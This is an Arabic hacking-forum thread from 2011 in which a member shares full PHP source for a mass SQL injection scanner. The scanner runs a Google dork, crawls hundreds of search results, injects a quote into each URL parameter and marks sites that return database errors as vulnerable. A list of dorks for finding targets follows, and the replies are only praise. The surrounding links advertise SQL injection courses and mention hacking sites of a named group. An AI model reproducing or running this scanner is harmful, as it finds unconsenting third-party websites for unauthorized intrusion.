1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

كود سورس سكربت البحث عن تغرات سيكول SQLi SCANNER

الموضوع في 'المواضيع المُكرّرة والمُخالفة' بواسطة احمد العراقي, بتاريخ ‏27 ديسمبر 2011.

كاتب الموضوع : احمد العراقي المشاهدات : 35,601 الردود : 7 ‏27 ديسمبر 2011
حالة الموضوع:
مغلق
  1. غير متصل

    احمد العراقي
    ExpErt DeveloPer

    عضو منذ:
    ‏17 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    [​IMG]

    السلام عليكم و رحمة الله تعالى و بركاته

    اليوم احبائي اتممت التعديل على سكربت البحث عن تغرات الSQL
    و عملتله موقع خاص فيه للمنتدى
    كما اضفت معه بعض الدوركات الحديثة
    واضفت الهيدر طبعا
    كما قمت بتعريبه
    الكود سورس
    كود PHP:
    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1256" />
    <title>IQ - TEAM SQLi Scanner </title>
    <style>
    body{
    background: #111010;
    color: #F9F9F9;
    font-family: monospace;
    font-size: 12px;

    }

    input{
    background: #111010;
    border: 2px solid #d00a2a;
    color: #ffff00;
    }

    h2{
    color: #55FFCC;
    }

    a{ color: #5A5A5A; text-decoration: none; }
    a:visited, a:active{ color: #5C5C5C; text-decoration: line-through; }
    a:hover{ color: #00FFCC; text-decoration: line-through; }
    .effectok:hover { text-decoration: underline; }
    .effectfalse:hover { text-decoration: line-through; }

    </style>

    </head>

    <div id="header">
      <div class="right"></div>
      <div class="left"></div>
        <div class="mid">
          <div align="center"><img src="http://www.iq.x10.bz/vb/web2/red-style/hatshy_header01.png" width="365" height="295" border="0" align="top" usemap="#Map">
    <map name="Map" id="Map"><area shape="rect" coords="314,262,353,275" href="http://www.iq.x10.bz/" target="_self" alt="الرئيسية">
    <area shape="rect" coords="261,262,304,276" href="http://www.iq.x10.bz/vb" target="_self" alt="المنتدى">
    <area shape="rect" coords="163,261,254,276" href="http://www.iq.x10.bz/vb" target="_self" alt="الدورات الإحترافية">
    <area shape="rect" coords="68,262,155,276" href="http://www.iq.x10.bz/vb/f20.html" target="_self" alt="SQL-injection">
    <area shape="rect" coords="14,263,58,275" href="sendmessage.php" target="_self" alt="اتصل بنا">
    </map></div>
      </div>
    </div>
    <body align="center">
    <div align=center>

    <?php
    echo "<h1>ArHack TEAM SQLi Scanner<BR></h1>";
    echo 
    "<form action='' method='post'>";
    echo 
    "<b><h3>Dork الدورك</h3> <p><input type='text' name='dork' value='inurl:php?=id+site'></p>";
    echo 
    "<input type='submit' value='  GO! '>";
    echo 
    "<hr><br />";

    if(
    $_POST['dork']) {

    @
    set_time_limit(0);
    @
    error_reporting(0);
    @
    ignore_user_abort(true);
    ini_set('memory_limit''128M');

    $google "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=REPLACE_DORK&num=100&hl=en&as_qdr=all&start=REPLACE_START&sa=N";

    $i 0;
    $a 0;
    $b 0;

    while(
    $b <= 900) {
    $a 0;
    flush(); ob_flush();
    echo 
    "@ Pages: [ $b ]<br />";
    echo 
    "@ Dork: [ <b>".$_POST['dork']."</b> ]<br />";
    echo 
    "@ Google Scanner ! .<br />";
    flush(); ob_flush();

    if(
    preg_match("/did not match any documents/"Connect_Host(str_replace(array("REPLACE_DORK""REPLACE_START"), array("".$_POST['dork']."""$b"), $google)), $val)) {
    echo 
    "See something but not found??<br />";
    flush(); ob_flush();
    break;
    }

    preg_match_all("/<h2 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/"Connect_Host(str_replace(array("REPLACE_DORK""REPLACE_START"), array("".$_POST['dork']."""$b"), $google)), $sites);
    echo 
    "Result of injection...<br />";
    flush(); ob_flush();
    while(
    1) {

    if(
    preg_match("/You have an error in your SQL|Division by zero in|supplied argument is not a valid MySQL result resource in|Call to a member function|Microsoft JET Database|ODBC Microsoft Access Driver|Microsoft OLE DB Provider for SQL Server|Unclosed quotation mark|Microsoft OLE DB Provider for Oracle|Incorrect syntax near|SQL query failed/"Connect_Host(str_replace("=""='"$sites[2][$a])))) {
    echo 
    "<a href='".Clean(str_replace("=""='"$sites[2][$a]))."' target='_blank' class='effectok'>".str_replace("=""='"$sites[2][$a])."</a> <== <font color='green'>  الموقع مصـــاب انا بريء منك- Yeah..Vulnerable ! </font><br />";
    } else {
    echo 
    "<a href='".Clean(str_replace("=""='"$sites[2][$a]))."' target='_blank' class='effectfalse'>".str_replace("=""='"$sites[2][$a])."</a> <== <font color='red'> الموقع غير مـصــابNot Vulnerable..sorry! </font><br />";
    flush(); ob_flush();
    }
    if(
    $a count($sites[2])-2) {
    echo 
    "Lets..scan other page.. <br />";
    break;
    }
    $a $a+1;
    }
    $b $b+100;
    }
    }

    function 
    Connect_Host($url) {
    $ch curl_init();
    curl_setopt($chCURLOPT_FOLLOW0);
    curl_setopt($chCURLOPT_HEADER1);
    curl_setopt($chCURLOPT_URL$url);
    curl_setopt($chCURLOPT_RETURNTRANSFER1);
    curl_setopt($chCURLOPT_TIMEOUT30);
    $data curl_exec($ch);
    if(
    $data) {
    return 
    $data;
    } else {
    return 
    0;
    }
    }

    function 
    Clean($text) {
    return 
    htmlspecialchars($textENT_QUOTES);
    }

    ?>
    </div>
    </body>
    </html> 

    <center><br><B>|IQ-T34M 2011 © All Rights reserved|</B> <td> 
    </br><p>
    <center> <font color="#D00A2A"><B>We KeeP It ReaL</B><br />By <br />~AHMAD~</font><br /><br />انا بريء من كل من استعملها في ما يخالف ديننا الحنيف <br />تحياتي~<br />D0n3.</center>

    <div align="left">
    Dork 2011 دوركات<br /><br />
    inurl:son.php?idld=<br />
    inurl:special.php?id=<br />
    inurl:club.php?id=<br />
    inurl:colum.php?id=<br />

    inurl:papier.php?id=<br />
    inurl:carton.php?id=<br />
    inurl:learn.php?id=<br />
    inurl:jour.php?id=<br />
    inurl:money.php?id=<br />
    inurl:profile.php?id=<br />
    inurl:go.php?=id<br />

    [​IMG]
     


    جاري تحميل الصفحة...
  2. غير متصل

    MrZead0
    rank
    Developer

    عضو منذ:
    ‏13 يناير 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: كود سورس سكربت البحث عن تغرات سيكول SQLi SCANNER

    تسلم ايدك ياغالى
    مبدع
     


  3. غير متصل

    ŠŦэâm
    rank
    Developer

    عضو منذ:
    ‏26 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: كود سورس سكربت البحث عن تغرات سيكول SQLi SCANNER

    بطل واصل ياكنق
     


  4. غير متصل

    Tej HAcKEr
    DeveloPer Plus

    عضو منذ:
    ‏15 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الوظيفة:
    hacker
    الإقامة:

    رد: كود سورس سكربت البحث عن تغرات سيكول SQLi SCANNER

    وَعليـَكم السلآم ورحمهَ اللهُ وبركآتهُ
    [​IMG]

    مَوضَوعُجـَميل


    يعطيُك الفَ عآفيُه
    [​IMG]
     


  5. غير متصل

    shbl
    rank
    Developer

    عضو منذ:
    ‏7 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: كود سورس سكربت البحث عن تغرات سيكول SQLi SCANNER

    مشكور ولك مودتي
    منتظرين جديدك
     


  6. غير متصل

    مسعود
    rank
    Developer

    عضو منذ:
    ‏9 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: كود سورس سكربت البحث عن تغرات سيكول SQLi SCANNER

    بطلُ اخـُويُ
     


  7. غير متصل

    Wo0oLf
    DeveloPer Plus

    عضو منذ:
    ‏22 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    7
    نقاط الجائزة:
    الوظيفة:
    طالب جامعي Computer science
    الإقامة:

    رد: كود سورس سكربت البحث عن تغرات سيكول SQLi SCANNER

    وعليكم السلآم ورحمة الله وبركآته ،،
    يعطيك ألف ع ـآفية ،
     


  8. غير متصل

    كلآشنكوف
    Developer

    عضو منذ:
    ‏19 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:

    رد: كود سورس سكربت البحث عن تغرات سيكول SQLi SCANNER

    شكرا لك على الموضوع الجميل و المفيذ ♥

    جزاك الله الف خير على كل ما تقدمه لهذا المنتدى
    :{1}:

    ننتظر ابداعاتك الجميلة بفارغ الصبر
    :{8}:
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...